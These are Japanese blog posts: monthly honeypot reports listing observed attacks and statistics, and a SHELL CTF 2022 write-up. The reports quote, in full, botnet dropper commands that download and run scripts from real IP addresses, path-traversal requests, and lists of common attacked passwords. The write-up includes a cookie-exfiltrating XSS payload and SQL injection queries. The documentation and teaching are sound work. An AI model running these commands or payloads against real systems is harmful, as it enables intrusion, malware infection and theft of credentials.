1	/apibins.sh	2af56ea833690dda4392fdfb28173cbf	"cd /tmp \|\| cd /run \|\| cd /; wget http://109.206.241.200/apibins.sh; chmod 777 apibins.sh; sh apibins.sh; tftp 109.206.241.200 -c get apitftp1.sh; chmod 777 apitftp1.sh; sh apitftp1.sh; tftp -r apitftp2.sh -g 109.206.241.200; chmod 777 apitftp2.sh; sh apitftp2.sh; rm -rf apibins.sh apitftp1.sh apitftp2.sh; rm -rf *"
2	/FBI.sh	00095a5b461379b3134c479733a7f1f6	"cd /tmp; wget http://45.207.9.93/FBI.sh; curl -O http://45.207.9.93/FBI.sh; chmod 777 FBI.sh; sh FBI.sh; tftp 45.207.9.93 -c get FBI1.sh; chmod 777 FBI1.sh; sh FBI1.sh; tftp -r FBI2.sh -g 45.207.9.93; chmod 777 FBI2.sh; sh FBI2.sh; rm -rf FBI.sh FBI1.sh FBI2.sh"
3	/Fourloko.sh	bf305092b30814e8d65ef5edebcbf470	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://208.67.104.94/Fourloko.sh; chmod 777 ; sh Fourloko.sh; tftp -g 208.67.104.94 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c"
4	/Gummybins.sh	f983824c5205cde37756ae4621d9152d	"rm -rf /tmp/ && rm -rf /root/ && cd /tmp \|\| cd /run \|\| cd /; wget http://199.195.249.90/Gummybins.sh; chmod 777 Gummybins.sh; sh Gummybins.sh; tftp 199.195.249.90 -c get Gummytftp1.sh; chmod 777 Gummytftp1.sh; sh Gummytftp1.sh; tftp -r Gummytftp2.sh -g 199.195.249.90; chmod 777 Gummytftp2.sh; sh Gummytftp2.sh; rm -rf Gummybins.sh Gummytftp1.sh Gummytftp2.sh; rm -rf *"
5	/mrrow.sh	e532d377d3c6492ee29131903f7f2852	"cd /tmp; rm -rf *; wget http://109.206.241.211/mrrow.sh; curl -O http://109.206.241.211/mrrow.sh; chmod 777 mrrow.sh; sh mrrow.sh"
6	/ohshit.sh	b37107730f879e60ff26eab9750ab75e	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://208.67.107.247/ohshit.sh; curl -O http://208.67.107.247/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 208.67.107.247 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 208.67.107.247; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 208.67.107.247 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *"
9	/ok.sh	fa989ee4d6974f66e3718703cd798202	"cd /tmp ; wget 46.252.26.161/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.252.26.161/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c"
10	/sensi.sh	f2e007efd288dc3412409b34531de18f	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://107.182.129.239/sensi.sh; curl -O http://107.182.129.239/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 107.182.129.239 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 107.182.129.239; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.182.129.239 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *"
11	/SnOoPy.sh	d41dd92d302f9732e2b977965ac42b34	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://137.184.84.112/SnOoPy.sh; chmod 777 ; sh SnOoPy.sh; tftp -g 137.184.84.112 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c"
12	/ssh-updater.sh	431f9cd36e2e6f910031daca965bcadd	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://37.187.87.141/ssh-updater.sh; curl -O http://37.187.87.141/ssh-updater.sh; chmod 777 ssh-updater.sh; sh ssh-updater.sh; rm -rf ssh-updater.sh"
13	/Syn0.sh	3aefe1dd16eb2cc0778db32e5f5ed6c4	"cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://rischyo.cf/Syn0.sh; chmod 777 Syn0.sh; sh Syn0.sh; rm -rf Syn0.sh "
14	/wget.sh	4522b61bad8c5d940be1205f1a508c8a	"cd /tmp; rm -rf wget.sh; wget http://109.206.241.211/wget.sh; curl -O http://109.206.241.211/wget.sh; chmod 777 wget.sh; ./wget.sh"
15	/z.sh	ace24b50d30cd1249a290a95511c20e1	"cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://204.76.203.76/z.sh; curl -O http://204.76.203.76/z.sh; chmod 777 z.sh; sh z.sh; tftp 204.76.203.76 -c get tz.sh; chmod 777 tz.sh; sh tz.sh; tftp -r tz2.sh -g 204.76.203.76; chmod 777 tz2.sh; sh tz2.sh; ftpget -v -u anonymous -p anonymous -P 21 204.76.203.76 z1.sh z1.sh; sh z1.sh; rm -rf z.sh tz.sh tz2.sh z1.sh; rm -rf *"

◆exeファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	\WINDOWS\svchost.exe		-

今月の作業BGM

曲名	アーティスト	備考
Animal	Neon Trees	---

2022-08-18

ハニーポット運用(月次報告:2022年7月)

Honeypot セキュリティ

今月のTopics

2022年7月2日にKDDI社の通信サービスにて大規模な通信障害が発生した。

news.kddi.com

通信障害の概要は以下と発表されている。

影響範囲

影響時間	影響エリア
7月2日（土） 1:35~ 7月4日（月）15:00 （61時間25分）	全国

影響数

音声（VoLTE）	影響エリア
約2,278万人	765万人以上

原因は経路誤設定による通信断から位置登録要求信号が大量に発生し、全国のVoLTE交換機と加入者DBが輻輳状態になったためであるとのこと。
7月29日に発表された障害報告資料は、良く纏められており参考になる内容であった。 https://www.kddi.com/extlib/files/corporate/ir/library/presentation/2023/pdf/kddi_220729_shougai_qybBYn.pdf?_ga=2.238695624.979087128.1660797447-60409627.1660797447

携帯電話が大半を占める現代社会においては公衆電話は廃れていくように感じるが、大規模災害などで公衆電話が利用される実績も過去にはあるため、一定数は残してほしいと個人的には思う。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2021年7月5日-2021年7月31日

運用期間：26日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	2,158,135	987,974
2	Cowrie	1,029,579	44,063
3	Honeytrap	456,584	-179,771
4	Heralding	454,482	167,482
5	Dionaea	253,563	-138,588
6	Mailoney	49,693	22,309
7	Adbhoney	11,364	3,494
8	Tanner	6,514	2,488
9	ConPot	2,580	740
10	Redishoneypot	2,465	39
11	CitrixHoneypot	1,803	241
12	Ciscoasa	1,452	-49
13	ElasticPot	1,125	432
14	Ipphoney	173	24
15	Dicompot	81	0
16	Medpot	0	-120

Result
- 特記事項無し

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	1,238,688	1(→)
2	United States	641,490	2(→)
3	Netherlands	391,300	4(↑)
4	China	278,490	3(↓)
5	Russia	249,637	5(→)
6	Singapore	135,287	12(↑)
7	Germany	106,211	11(↑)
8	Japan	99,295	6(↓)
9	India	82,102	8(↓)
10	Vietnam	80,482	9(↓)
11	United Kingdom	70,906	10(↓)
12	South Korea	63,652	13(↑)
13	Bangladesh	59,277	14(↑)
14	France	41,284	17(↑)
15	Indonesia	39,845	15(→)
16	Hong Kong	39,217	19(↑)
17	Taiwan	38,788	圏外(↑)
18	Canada	33,202	圏外(↑)
19	Sweden	29,375	16(↓)
20	Latvia	25,923	圏外(↑)

Result
- 先月に引き続きBrazil , United Statesからのアクセスが多かった。
- China , Russiaからのアクセスは小康状態にある。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	162,184
2	CVE-2020-11910	3,393
3	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	45
4	CVE-1999-0016	1

Result
- 特記事項無し

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	71,677
2	sa	10,501
3	admin	7,972
4	nproc	3,682
5	user	2,176
6	(empty)	1,352
7	support	1,222
8	test	1,189
9	22	884
10	postgres	847
11	ubuntu	847
12	oracle	524
13	2Wire	449
14	!root	430
15	git	389
16	ftpuser	358
17	guest	319
18	www	295
19	adm	290
20	user2	263
21	mysql	257
22	666666	239
23	blank	236
24	0	235
25	debug	235
26	jenkins	228
27	unknown	228
28	administrator	227
29	$ALOC$	223
30	ubnt	222
31	deploy	221
32	testuser	215
33	ftp	214
34	anonymous	208
35	minecraft	204
36	Admin	190
37	user1	190
38	db	183
39	web	177
40	wwwroot	172
41	test1	152
42	www-data	141
43	dev	135
44	server	132
45	tomcat	132
46	alex	126
47	nagios	126
48	hadoop	124
49	steam	122
50	ts3	122

Result
- saユーザへのアクセスが若干増えている。

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	123456	4,519
2	admin	4,313
3	nproc	3,682
4	(empty)	2,975
5	123	1,722
6	password	1,529
7	1234	1,435
8	1	1,326
9	12345	1,119
10	suport	727
11	blank	677
12	12345678	667
13	0	491
14	test	396
15	user	376
16	123456789	342
17	666666	318
18	123123	311
19	ubnt	304
20	support	301
21	root	291
22	master	282
23	1234567	268
24	alpine	262
25	P@ssw0rd	260
26	00000000	258
27	111111	247
28	qwerty	247
29	backup	246
30	1qaz2wsx	244
31	hi3518	232
32	unknown	231
33	synnet	227
34	10023	222
35	_Cisco	219
36	!ishtar	212
37	1q2w3e4r	206
38	admin123	204
39	Passw0rd	195
40	test123	192
41	abc123	190
42	passw0rd	190
43	bosco	172
44	Pa$$w0rd	171
45	p@ssw0rd	165
46	123qwe	164
47	1234567890	162
48	12	152
49	P@ssword	151
50	pa55word	147

Result
- 特記事項無し

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

7月はshファイルを利用したアクセスを複数確認した。ohsitsvegawellrip.shについては8月1日時点でVirusTotalにおいて多くの対策ソフトでmalwareとは検知されていない。

◆shファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	/sora.sh	2655c5108f0fbe1b4988e473ea7cf975	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://193.233.188.118/sora.sh; curl -O http://193.233.188.118/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 193.233.188.118 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 193.233.188.118; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.233.188.118 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
2	/sora.sh	b4c8a40638801a1b5c6701ee8c4d96ff	CMD: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://37.0.8.157/sora.sh; curl -O http://37.0.8.157/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 37.0.8.157 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 37.0.8.157; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.0.8.157 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
3	/sh	078e9a9b315d76ae99d7449aa8182fee	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
4	/dompdf.php	61aeec46a50c9ea8268014d2e7f0c0ef	/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php
5	/dompdf.php	61aeec46a50c9ea8268014d2e7f0c0ef	/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php
6	/catvsdog.sh	33e442e5a30a40dbb0fe303e8d296ad5	CMD: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://37.187.87.141/catvsdog.sh; curl -O http://37.187.87.141/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 37.187.87.141 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 37.187.87.141; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 37.187.87.141 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh;
7	/z.sh	0e2cc69b4f0c859bd59bc34f48a3d44d	CMD: cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://185.225.73.78/z.sh; curl -O http://185.225.73.78/z.sh; chmod 777 z.sh; sh z.sh; tftp 185.225.73.78 -c get tz.sh; chmod 777 tz.sh; sh tz.sh; tftp -r tz2.sh -g 185.225.73.78; chmod 777 tz2.sh; sh tz2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.225.73.78 z1.sh z1.sh; sh z1.sh; rm -rf z.sh tz.sh tz2.sh z1.sh; rm -rf *
8	/ssi/printenv.shtml	27a505e858e000b7a478dfde26bf8378	/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
9	/nig.sh	4bb1da6f7a9b5e3ddcac0c1d0c14a547	CMD: rm -rf nig.sh; rm -rf miori.*; wget http://81.161.229.116/nig.sh \|\| curl -O http://81.161.229.116/nig.sh \|\| tftp 81.161.229.116 -c get nig.sh \|\| tftp -g -r nig.sh 81.161.229.116; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh
10	/ok.sh	34750f03237595d58567332a2346a23c	cd /tmp ; wget 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c
11	/8UsA2.sh	42dd431252129ecc2eb88c52d06d5216	CMD: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://208.67.106.145/8UsA.sh; curl -O http://208.67.106.145/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 208.67.106.145 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 208.67.106.145; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 208.67.106.145 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *,
12	/brokeskid.sh	d54b92f364fafc14696e85f94a36c9f2	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://62.197.136.157/brokeskid.sh; chmod 777 ; sh brokeskid.sh; tftp -g 62.197.136.157 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c
13	/bin.sh	0c5590a0fbde98b80e6865a543b64009	CMD: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://75.119.139.188/bin.sh; chmod 777 ; sh bin.sh; tftp -g 75.119.139.188 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c
14	/ohsitsvegawellrip.sh	995ad2adfc03237543b2446317ba5f06	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://37.221.67.212/ohsitsvegawellrip.sh; curl -O http://37.221.67.212/ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp 37.221.67.212 -c get ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp -r ohsitsvegawellrip2.sh -g 37.221.67.212; chmod 777 ohsitsvegawellrip2.sh; sh ohsitsvegawellrip2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.221.67.212 ohsitsvegawellrip1.sh ohsitsvegawellrip1.sh; sh ohsitsvegawellrip1.sh; rm -rf ohsitsvegawellrip.sh ohsitsvegawellrip.sh ohsitsvegawellrip2.sh ohsitsvegawellrip1.sh; rm -rf *

◆exeファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	csrss.exe		-

今月の作業BGM

曲名	アーティスト	備考
Good Time	Owl City & Carly Rae Jepsen	---

2022-08-15

SHELL CTF 2022 - Writeup

CTF

2022年8月12日, 12:30 UTC - 8月14日, 12:30 UTCに開催されたSHELL CTF 2022 に会社のチームで参加した。他のチームメンバーの陰で9問解いたので、以下にWriteupを記載する。

Chiper

Tring Tring....

Tring Tring my mobile started ringing. "Hey Check your SMS!!"

----. ----. ----. / -.... -.... -.... / ---.. ---.. / ..--- ..--- ..--- / ..--- / -.... -.... / --... --... --... / ...-- ...-- / ..--- / ...-- / -.... / ----. ----. ----. / --... --... --... --... / -.... / --... --... --... --...

Flag Format: SHELL{SOMETHINGHERE}

問題のメッセージをモールスコードとしてデコードすると9996668822226677733236999777767777という数字になる。

問題文の内容からMulti-tap Phone Cipher (SMS)を推測して解析するとflagが得られる。

flag : SHELL{YOUCANREADMYSMS}

Forensic

Alien Communication

Aliens are trying to communicate something. They belive in seeing more than what they are hearing. can you help us trying to decode what they are trying to say?

添付ファイルをスペクトル表示するとflagが確認できる。

flag : SHELL{YOUCANREADMYSMS}

Secret Document

"shell is the key if you did'nt get it xorry"

問題文からshellというキーワードと添付ファイルを XORすれば良いことが分かる。

flag : shell{y0u_c4n_s33_th3_h1dd3n}

Hidden File

Our Agent gave us this image can you find whats there with this image?

Exif情報で確認したパスワードshellによりsteghideツールを使ってHidden Files.zipファイルが抽出できる。

root@kali:# steghide extract -sf Hidden.jpg 
Enter passphrase: 
wrote extracted data to "Hidden Files.zip".

Hidden Files.zipファイルにはse3cretf1l3.pdfとsomething.jpg、パスワード付きのflag.zipがある。
se3cretf1l3.pdfをlibraofiiceで確認すると透明な文字でkey is shellctfと記載されていることが分かる。
判明したパスワードを使ってflag.zipを解凍するとflag.txtが確認できる。

flag : shell{y0u_g07_th3_flag_N1c3!}

GO Deep!

Our one of the agent gave us this file and said "Go Deep!"

wavファイルでDeepとあるので連想ゲームからDeepSoundを確認する。(はらたいらさんに3,000点はクイズダービー...)

DeepSoundで添付ファイルを開くとパスワードを求められる。この時、チームメンバーの方がwavファイルの中からpassword:shellであることを気付いていた。

判明したパスワードを使うとDeep Flag.txtが抽出でき、flagを確認できる。

flag : SHELL{y0u_w3r3_7h1nk1ng_R3ally_D33p}

Heaven

"I was in the seventh heaven painted red green and blue"

問題文からMSBのR,B,Gを確認するとflagがある。

flag : SHELL{man1pul4t1ng_w1th_31ts_15_3A5y}

Web

Choosy

Single solution doesn't works on all problems. One should try different solutions for different problem.

Flag format:- shellctf{H3re_1s_tH3_F14g}

http://20.125.142.38:8324

Alternate link http://20.193.247.209:8333/

指定されたURLへアクセスするとフォームの入力画面が表示される。

XSSの脆弱性がある。<script>タグは置換されるが1回だけなので、<scrscriptipt>のような形式で<script>となり発火できる。
scriptタグのサニタイジングがあるのでXSS問題かと連想できる。
色々確認していたところ、強制的にエラーを出すペイロードを入力するとflagの記載されたアラートが表示された。

<img/src=`%00` onerror=location.href='https://<My Server IP address>/123?'+document.cookie;>

flag : shellctf{50oom3_P4yL0aDS_aM0ng_Maaa4nnY}

Extractor

We are under emergency. Enemy is ready with its nuclear weapon we need to activate our gaurds but chief who had password is dead. There is portal at URL below which holds key within super-user account, can you get the key and save us.

Flag format :- shellctf{H3re_1s_tH3_fL4G}

http://20.125.142.38:8956

Alternate URL :- http://20.193.247.209:8555/

More Alternate URL :- http://52.66.29.74:8999/

指定されたURLへアクセスするとフォームの入力画面が表示される。

問題タイトルからSQLインジェクションの問題かと連想できる。
試しにpassword欄に' or 'a'='a' --を入力するとuser情報が表示される。
適当な文字を入力した際は何も表示されない。
user情報が表示される場合を正常としてBlindSqlインジェクションを試す。

http://52.66.29.74:8999/profile?username=121212&pass=%27%20or%20((SELECT%20length(tbl_name)%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_name%20not%20like%20%27sqlite_%%27%20limit%201%20offset%200)=6)%20--%20&content=1

' or ((SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('A')) -- 
　・
　・

→Table名はAdmins

http://52.66.29.74:8999/profile?username=121212&pass=%27%20or%20((SELECT%20length(sql)%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20limit%201%20offset%200)=140)%20--%20&content=1

' or ((SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' limit 1 offset 0) = hex('C')) --
　・
　・

→Table構造としてAdminsテーブルにid,user,pass,contentのカラムがある。
contentカラムの内容を確認するとflagが確認できる

' or ((SELECT hex(substr(content,1,1)) FROM Admins) = hex('s')) --
' or ((SELECT hex(substr(content,2,1)) FROM Admins) = hex('h')) --
' or ((SELECT hex(substr(content,3,1)) FROM Admins) = hex('e')) --
' or ((SELECT hex(substr(content,4,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,5,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,6,1)) FROM Admins) = hex('c')) --
' or ((SELECT hex(substr(content,7,1)) FROM Admins) = hex('t')) --
' or ((SELECT hex(substr(content,8,1)) FROM Admins) = hex('f')) --
' or ((SELECT hex(substr(content,9,1)) FROM Admins) = hex('{')) --
' or ((SELECT hex(substr(content,10,1)) FROM Admins) = hex('S')) --
' or ((SELECT hex(substr(content,11,1)) FROM Admins) = hex('q')) --
' or ((SELECT hex(substr(content,12,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,13,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,14,1)) FROM Admins) = hex('1')) --
' or ((SELECT hex(substr(content,15,1)) FROM Admins) = hex('N')) --
' or ((SELECT hex(substr(content,16,1)) FROM Admins) = hex('j')) --
' or ((SELECT hex(substr(content,17,1)) FROM Admins) = hex('3')) --
' or ((SELECT hex(substr(content,18,1)) FROM Admins) = hex('c')) --
' or ((SELECT hex(substr(content,19,1)) FROM Admins) = hex('7')) --
' or ((SELECT hex(substr(content,20,1)) FROM Admins) = hex('i')) --
' or ((SELECT hex(substr(content,21,1)) FROM Admins) = hex('0')) --
' or ((SELECT hex(substr(content,22,1)) FROM Admins) = hex('n')) --
' or ((SELECT hex(substr(content,23,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,24,1)) FROM Admins) = hex('B')) --
' or ((SELECT hex(substr(content,25,1)) FROM Admins) = hex('4')) --
' or ((SELECT hex(substr(content,26,1)) FROM Admins) = hex('5')) --
' or ((SELECT hex(substr(content,27,1)) FROM Admins) = hex('i')) --
' or ((SELECT hex(substr(content,28,1)) FROM Admins) = hex('C')) --
' or ((SELECT hex(substr(content,29,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,30,1)) FROM Admins) = hex('X')) --
' or ((SELECT hex(substr(content,31,1)) FROM Admins) = hex('D')) --
' or ((SELECT hex(substr(content,32,1)) FROM Admins) = hex('}')) --

flag : shellctf{Sql_1Nj3c7i0n_B45iC_XD}

Doc Holder

Can you share portable document with us which looks like it when we seet portable document with eyes but ti's not actually portable document.

More a misc problem ...

My Favourite move is Inferno overwrite 

http://20.125.142.38:8508

Alternate Link :- http://20.193.247.209:8666/

Hint --- Challenge is all about file extension of the file that you are uploading....

指定されたURLへアクセスするとファイルのアップロード画面が表示される。

.pdfの拡張子のTEXTファイルをアップロードするとメッセージが変わる

問題文から拡張子+overwriteでRLO (Right-to-Left Override)に関係すると考えられる。
メモ帳でhoge.を入力した後に右クリック→Unicode制御文字の挿入→RLOをクリックしてfdpを入力する。このhoge.pdfをファイル名にコピペする。

上記のhoge.pdfをアップロードするとflagが確認できる。

flag : shellctf{R1ghtt_t0_l3ft_0veRiDe_1s_k3Y}

感想

Raw Agent は1つ目のflagはわかったが2つ目が解けず。無念...

1つ目のflagは問題を解く中の途中で出てくるアンノーンの画像のUSSERAGENT

2つ目のflagは最後のUltimate Level の時に表示されるGreninja.pngをzstegで解析した際に出てくるbase64文字からGoogleドライブのファイルを確認する。

root@kali:# Greninja.png 
b1,r,lsb,xy         .. text: "N?xZo5^Qz5xY"
b1,rgb,lsb,xy       .. text: "aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xTmxsVnJtckhkTEhSZ1g2c1Y1MzlMMVp6Ym5SR0N2ZHIvdmlldz91c3A9c2hhcmluZw"
b1,bgr,lsb,xy       .. <wbStego size=1184705, data="9`Ym!\xCDcn\xC1\xB7"..., even=false, enc="wbStego 2.x/3.x", controlbyte="\x84">
b1,rgba,lsb,xy      .. text: ";1WWs9}W"
b2,r,lsb,xy         .. file: MIPSEB MIPS-III ECOFF executable not stripped - version 21.68
b2,r,msb,xy         .. text: ["U" repeated 17 times]
b2,g,msb,xy         .. text: "QTAETUUUUUUUUUUUUUUUUUPUUUU"
b2,b,msb,xy         .. text: "TQTUUUUUUUUUUUUUUUUUA"
b2,rgb,lsb,xy       .. file: Targa image data (4416-1284) 20752 x 5125 x 16 +1300 +16400 - right - interleave "\025A\005A\024E\024\005\024Q\024P\005\004\021D\021\005\005\021\024T\024\004\005\004\005A\024T\024\004\020\025\021\021\025\021\021A\005\004\005A\025\020\020P\005\004\021D\025"                                                                                                       
b3,b,msb,xy         .. file: StarOffice Gallery theme @\022 H\022\004\010\222\004, 16842751 objects, 1st \001
b4,r,msb,xy         .. text: "Db1@qVUC1Uu26b&@edf7waQ3wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww7SUU"
b4,g,lsb,xy         .. file: PEX Binary Archive
b4,g,msb,xy         .. text: "q6VwwW33swDD\"f1@p@"
b4,b,lsb,xy         .. file: Targa image data - Map 272 x 4353 x 16 +257 +4113 "\001\020\020\001\021\001\021"
b4,b,msb,xy         .. text: "$T1ww7wwwwww7SswS3U3333ww7W&sW7Uswwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww7SU5swS5wwwEc"
b4,rgb,lsb,xy       .. file: Novell LANalyzer capture file
b4,abgr,msb,xy      .. file: Applesoft BASIC program data, first line number 15

root@kali:# echo "aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xTmxsVnJtckhkTEhSZ1g2c1Y1MzlMMVp6Ym5SR0N2ZHIvdmlldz91c3A9c2hhcmluZw"| base64 -d
https://drive.google.com/file/d/1NllVrmrHdLHRgX6sV539L1ZzbnRGCvdr/view?usp=sharingbase64: 無効な入力

↓

https://drive.google.com/file/d/1NllVrmrHdLHRgX6sV539L1ZzbnRGCvdr/view?usp=sharing

パスワード付きflag.txt.7zファイルのパスワードについて
問題途中のbr*infuckで確認できたメッセージ

Rhydon Togepi Milotic Machamp Tyrantrum Psyduck Mewtwo Pachirisu Altaria Magnezone P1k4cHu Dialga Gyarados Dragonite Eevee Luc4r10 Deoxys Zapdos Ch4r1zArD Rotom Gardevoir Unkn0Wn G0dz1lL4 Electrode Escavalier Garchomp Zygarde Blaziken Greninja

上記の内のLuc4r10で解凍すると2つ目のflagである_p4raM37eR_P0llu7iOnが確認できる。(G0dz1lL4はポケモンではないのでは...?)

2022-08-07

ハニーポット運用(月次報告:2022年6月)

Honeypot セキュリティ

今月のTopics

6月21日(火)にBIPROGY社の協力会社社員による大規模な情報漏洩事故が発生した。

コールセンターでのデータ移管作業用に尼崎市の全市民(約46万人分)の個人情報を含むUSBメモリーを就業先から持ち出した後、帰宅時に当該USBメモリーを入れたかばんの紛失したとの報道による発表がなされた。

本件にはUSBを用いた情報セキュリティ運用の典型的な例であり、身につまされる事故である。
考えられる問題点は以下の通り。

USBの持ち出しについて再委託先社員による持ち出し運用を尼崎市が把握しておらず、尼崎市が受託者に対してUSBメモリー持ち出時の許可を得る運用を徹底していなかったこと。
情報の運搬にあたり、BIPROGY社の協力会社社員が個人でUSBメモリーを就業先から持ち出したこと。
BIPROGY社の協力会社社員によるUSBメモリーの運搬にあたり、適切な対応がとられていないこと。
情報漏洩発生時に即座に関係先への情報連絡がなされず、BIPROGY社の協力会社社員が個人で捜索した後に情報連絡がなされたこと。

www.city.amagasaki.hyogo.jp

何はともあれ6/24に対象のUSBメモリーが発見されて良かったものである。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年6月10日-2022年6月30日

運用期間：20日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	1,170,161	211,433
2	Cowrie	985,516	▲610,883
3	Honeytrap	636,355	▲272,039
4	Dionaea	392,151	34,410
5	Heralding	287,000	▲548,748
6	Mailoney	27,384	11,345
7	Adbhoney	7,870	▲6,428
8	Tanner	4,026	▲2,634
9	Redishoneypot	2,426	▲2,062
10	ConPot	1,840	▲279
11	CitrixHoneypot	1,562	▲1,322
12	Ciscoasa	1,501	▲1,456
13	ElasticPot	693	▲193
14	Ipphoney	149	▲62
15	Medpot	120	▲1,414
